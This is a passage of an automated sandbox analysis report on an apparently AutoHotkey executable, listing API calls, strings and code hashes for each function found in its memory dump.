                                      • Instruction Fuzzy Hash: F7817970604380ABE320EF14EC41BAB77E4FB46704F14497FE9858B295EB7A9805C79E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: __wcsicoll__wcsnicmp
                                      • String ID: Fast$Float$Integer$Parameter #1 invalid.$Parameter #2 invalid.
                                      • API String ID: 28402859-2639214213
                                      • Opcode ID: b72e62aa2592e3512aa05990c33610789e3ca5cdb8d7ed5b43b95686997d2127
                                      • Instruction ID: b876748a681c5d0ec0c40d26754318785c8a96c57af8143fab573977090a1c22
                                      • Opcode Fuzzy Hash: b72e62aa2592e3512aa05990c33610789e3ca5cdb8d7ed5b43b95686997d2127
                                      • Instruction Fuzzy Hash: FD5124347083509BEB20EB1AE8457A777D1AB81318F88486FE84587392D77EDC85C76A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • WSAStartup.WSOCK32(00000101,?), ref: 0045C1CE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: Startup
                                      • String ID: 0.0.0.0$OU@
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _memset.LIBCMT ref: 004690D5
                                      • LoadCursorW.USER32 ref: 00469121
                                      • RegisterClassExW.USER32(00000000), ref: 00469140
                                      • CreateWindowExW.USER32(?,AutoHotkeyGUI,02C40164,?,00000000,00000000,00000000,00000000,?,00000000,00400000,00000000), ref: 004691B1
                                      • SendMessageW.USER32(00000000,00000080,00000000,000B018F), ref: 004691F1
                                      • SendMessageW.USER32(?,00000080,00000001,0007044D), ref: 004691FF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: MessageSend$ClassCreateCursorLoadRegisterWindow_memset
                                      • String ID: 0$AutoHotkeyGUI$RegClass
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __swprintf.LIBCMT ref: 004615EE
                                      • FormatMessageW.KERNEL32(00001200,00000000,?,00000000,?,00001000,00000000,004B0CF8), ref: 00461611
                                      • _vswprintf_s.LIBCMT ref: 00461656
                                      • SysFreeString.OLEAUT32(?), ref: 00461686
                                      • SysFreeString.OLEAUT32(00000000), ref: 0046168C
                                      • SysFreeString.OLEAUT32(?), ref: 00461692
                                      Strings
                                      • 0x%08X - , xrefs: 004615E8
                                      • No valid COM object!, xrefs: 004615DC
                                      • Source:%wsDescription:%wsHelpFile:%wsHelpContext:%d, xrefs: 0046164D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: FreeString$FormatMessage__swprintf_vswprintf_s
                                      • String ID: Source:%wsDescription:%wsHelpFile:%wsHelpContext:%d$0x%08X - $No valid COM object!
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: UTF-16$UTF-16-RAW$UTF-8$UTF-8-RAW
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SendMessageW.USER32(?,00000030,?,?), ref: 0046B326
                                      • GetDC.USER32(?), ref: 0046B34F
                                      • SelectObject.GDI32(00000000,?), ref: 0046B371
                                      • GetTextMetricsW.GDI32(00000000,?), ref: 0046B388
                                      • SendMessageW.USER32(?,00001033,00000000,00000000), ref: 0046B3A9
                                      • GetSystemMetrics.USER32(0000000C), ref: 0046B3FF
                                      • GetSystemMetrics.USER32(00000032), ref: 0046B42F
                                      • SendMessageW.USER32(?,00001033,00000000,00000000), ref: 0046B476
                                      • SendMessageW.USER32(?,00001040,?,000000FF), ref: 0046B4CD
                                      • MoveWindow.USER32(?,?,?,?,-00000004,00000001,?,00001040,?,000000FF), ref: 0046B4FB
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: MessageSend$Metrics$System$MoveObjectSelectTextWindow
                                      • String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CharLowerW.USER32(?,?,?,?,?,?,00000000,00000000,00000000,?,?,00424020,?,004B2BA8,004B2BA0,00000001), ref: 004805E7
                                      • CharUpperW.USER32(?,?,?,00424020,?,004B2BA8,004B2BA0,00000001,00000001,000000FF,00000000), ref: 00480602
                                      • CharLowerW.USER32(?,?,?,?,00424020,?,004B2BA8,004B2BA0,00000001,00000001,000000FF,00000000), ref: 0048062E
                                      • CharUpperW.USER32(?,?,?,?,00424020,?,004B2BA8,004B2BA0,00000001,00000001,000000FF,00000000), ref: 00480643
                                      • CharLowerW.USER32(?,?,?,?,00424020,?,004B2BA8,004B2BA0,00000001,00000001,000000FF,00000000), ref: 0048067D
                                      • CharLowerW.USER32(00000000,?,?,?,?,00424020,?,004B2BA8,004B2BA0,00000001,00000001,000000FF,00000000), ref: 0048068A
                                      • CharLowerW.USER32(?,?,?,?,?,?,00424020,?,004B2BA8,004B2BA0,00000001,00000001,000000FF,00000000), ref: 004806A4
                                      • CharLowerW.USER32(?,?,?,?,?,?,00424020,?,004B2BA8,004B2BA0,00000001,00000001,000000FF,00000000), ref: 004806B2
                                      • CharLowerW.USER32(?,?,?,?,?,?,00424020,?,004B2BA8,004B2BA0,00000001,00000001,000000FF,00000000), ref: 004806CE
                                      • CharLowerW.USER32(00000000,?,?,?,?,?,00424020,?,004B2BA8,004B2BA0,00000001,00000001,000000FF,00000000), ref: 004806DB
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Char$Lower$Upper
                                      • String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SendMessageW.USER32(?,00000407,00000000,?), ref: 00473781
                                      • SendMessageW.USER32(00000000,00000408,00000001,?), ref: 00473791
                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004737D9
                                      • SendMessageW.USER32(?,00000408,00000001,00000000), ref: 004737E6
                                      • SendMessageW.USER32(?,00000417,00000000,00000000), ref: 004737FA
                                      • SendMessageW.USER32(?,00000415,00000000,?), ref: 0047380E
                                      • SendMessageW.USER32(?,0000041B,00000001,00000000), ref: 00473822
                                      • SendMessageW.USER32(?,0000041F,?,00000000), ref: 00473837
                                      • SendMessageW.USER32(?,00000420,00000001,?), ref: 0047384D
                                      • SendMessageW.USER32(?,00000420,00000000), ref: 00473863
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • EnterCriticalSection.KERNEL32(004D85F4,00000000,?,00000000), ref: 004535A7
                                      • LeaveCriticalSection.KERNEL32(004D85F4), ref: 0045370C
                                      • LeaveCriticalSection.KERNEL32(004D85F4), ref: 004538BF
                                      • _free.LIBCMT ref: 0045390A
                                      • __wcsdup.LIBCMT ref: 00453934
                                      • LeaveCriticalSection.KERNEL32(004D85F4), ref: 00453977
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CriticalSection$Leave$Enter__wcsdup_free
                                      • String ID: 0$Compile error %d at offset %d: %hs
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Extra$File$Line$Message$The current thread will exit.$This DllCall requires a prior VarSetCapacity.$__Delete will now return.
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00403B80: _free.LIBCMT ref: 00403BB4
                                        • Part of subcall function 00403B80: _free.LIBCMT ref: 00403BEA
                                        • Part of subcall function 00403B80: _free.LIBCMT ref: 00403C0D
                                      • GetTickCount.KERNEL32 ref: 004015E9
                                      • GetMessageW.USER32(?,00000000,00000000,-00000311), ref: 00401630
                                      • GetTickCount.KERNEL32 ref: 0040163B
                                      • GetFocus.USER32 ref: 004016D4
                                      • TranslateAcceleratorW.USER32(00000000,?,?), ref: 0040171A
                                        • Part of subcall function 004033B0: GetTickCount.KERNEL32 ref: 004033B0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountTick_free$AcceleratorFocusMessageTranslate
                                      • String ID: 6Dd$InputHook$8&
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountForegroundTickWindow
                                      • String ID: 0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Eject$Label$Lock$Unlock
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$__wcsicmp_l
                                      • String ID: Client$Relative$Screen$Window
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      • Too few parameters passed to function., xrefs: 0047962E
                                      • Parameter #2 invalid., xrefs: 0047983F
                                      • Parameter #1 invalid., xrefs: 004796B6
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Parameter #1 invalid.$Parameter #2 invalid.$Too few parameters passed to function.
                                      • API String ID: 0-982959277
                                      • Opcode ID: 2ba94e84eea023d7931f8f208e9a98c14f54be12c39add66d1bc98eac8bbd131
                                      • Instruction ID: 323e6a2a06831ad46e16a493863aa910e71cb944f2e73ec95725d67e05fe1321
                                      • Opcode Fuzzy Hash: 2ba94e84eea023d7931f8f208e9a98c14f54be12c39add66d1bc98eac8bbd131
                                      • Instruction Fuzzy Hash: AFD16C716042069FDB14CF19C580AABB3E1FB84318F14CA2FE85987341D779ED55CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID: <exception>$<response command="property_set" success="%i" transaction_id="%e"/>$OU@$float$integer$string
                                      • API String ID: 269201875-251188936
                                      • Opcode ID: 5b646af94fb7b5472deeacfe5ece99372dba85d711dd5f442bf5f4f2d619528f
                                      • Instruction ID: ea7e7c0c8152a396bd99c501e86dc5d209398b458e9bff96b0edc4aa1427ebf3
                                      • Opcode Fuzzy Hash: 5b646af94fb7b5472deeacfe5ece99372dba85d711dd5f442bf5f4f2d619528f
                                      • Instruction Fuzzy Hash: 98A1CF711083029FC710CF25C681A2BBBE5BB94754F144A2FF8D5AB2C1DB39D942CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __fassign$__wcsnicmp
                                      • String ID: GDI+$Icon
                                      • API String ID: 1066767119-2641797909
                                      • Opcode ID: 14dd2da963c5e33db04d023e31245f0d8be0bba2200e09e10fa6c681d7f62fa0
                                      • Instruction ID: a90b1513ac67f8cb14990d5fcab72feaa32ed209691aca3dd47fe741971440c7
                                      • Opcode Fuzzy Hash: 14dd2da963c5e33db04d023e31245f0d8be0bba2200e09e10fa6c681d7f62fa0
                                      • Instruction Fuzzy Hash: A191F4715002009BC7209F198846B3B77E09F85719F144A6FFC869B392E378DD69C7AB
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _free_wcsncpy$_malloc_wcschr
                                      • String ID: Out of memory.
                                      • API String ID: 609840974-4087320997
                                      • Opcode ID: 7e0c9e94e2ee208a637c642467774ddff0c7be2fc2e1f1ed0a543aad5e89ea21
                                      • Instruction ID: cd064838ee68a4cbfcef6521c801cb1d8a79460dee6fc2d10f3a0395d6e69a81
                                      • Opcode Fuzzy Hash: 7e0c9e94e2ee208a637c642467774ddff0c7be2fc2e1f1ed0a543aad5e89ea21
                                      • Instruction Fuzzy Hash: 3B919FB1E002169BCF20DF58C841AAAF3B5EF98300F14505FF84997341EB79AE51CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SendMessageW.USER32(02C50FB0,00001032,00000000,00000000), ref: 0045834F
                                      • __wcsnicmp.LIBCMT ref: 0045836A
                                      • SendMessageW.USER32(02C50FB0,00001004,00000000,00000000), ref: 004583A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: MessageSend$__wcsnicmp
                                      • String ID: Col
                                      • API String ID: 2103314646-737980560
                                      • Opcode ID: d5efc11f1e9e223843c4b0948a52296deb1a25f765792460e65b3dc2ffa677e2
                                      • Instruction ID: 263f4e8d9834074fc1ec893a6b5fe48e5be853a356a0d61678cf834c9888f934
                                      • Opcode Fuzzy Hash: d5efc11f1e9e223843c4b0948a52296deb1a25f765792460e65b3dc2ffa677e2
                                      • Instruction Fuzzy Hash: BB61D1716003028BD720DF29D881B2AB7E4EB95716F10456FFD45A7382EF39DC49C6AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __ultow
                                      • String ID: &%s;$amp$apos$quot
                                      • API String ID: 2316798077-350231602
                                      • Opcode ID: b2b92453d82d77812000b86d581072dc97e768d685eb95547e74d3ca11d767e4
                                      • Instruction ID: 1885f5021236f6ff472df57e361ee7b55e5cefd21785e4f65e8c0ac3811f1551
                                      • Opcode Fuzzy Hash: b2b92453d82d77812000b86d581072dc97e768d685eb95547e74d3ca11d767e4
                                      • Instruction Fuzzy Hash: 1A61EA30604206ABEF14CF58C488676B7B1EB52304F2444BFD482BB7D3D6399E46D759
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CharUpperW.USER32(?,?,?,?,?,00402190,?,?), ref: 00412561
                                      • CharUpperW.USER32(?,?,?,?,?,00402190,?,?), ref: 00412572
                                      • __swprintf.LIBCMT ref: 004125DC
                                      • Sleep.KERNEL32(00000000), ref: 00412651
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CharUpper$Sleep__swprintf
                                      • String ID: %s%c${Raw}${Text}
                                      • API String ID: 676149037-2444501380
                                      • Opcode ID: d4e5a247d4b8ea13b8c6cf8cdab22fe946192cb4facecacf7122fed73752beba
                                      • Instruction ID: bc389fd488c8ea59aed5ba1bb2efad553bf02c72d67c668d2e9a80ac614513e4
                                      • Opcode Fuzzy Hash: d4e5a247d4b8ea13b8c6cf8cdab22fe946192cb4facecacf7122fed73752beba
                                      • Instruction Fuzzy Hash: 5551D1306047459BDB209F2985907EBBBE1FF89304F04492EE8CAC7391E7B8E894C759
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • WSAAsyncSelect.WSOCK32(FFFFFFFF,00000000,00000000,00000000,00000001,00000000), ref: 00406230
                                      • _memmove.LIBCMT ref: 00406341
                                      • ioctlsocket.WSOCK32(FFFFFFFF,8004667E,?), ref: 00406242
                                        • Part of subcall function 0040895F: #16.WSOCK32(FFFFFFFF,00000000,00000000,00000000,004DA6A0,?,00000000,0040635D,?), ref: 004089B3
                                      • WSAAsyncSelect.WSOCK32(FFFFFFFF,00000408,00000021,?), ref: 004063D5
                                      Strings
                                      • <response command="%s" transaction_id="%e, xrefs: 004062E7
                                      • <error code="%i"/></response>, xrefs: 00406305
                                      • <response command="%s" transaction_id="%e"/>, xrefs: 00406390
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
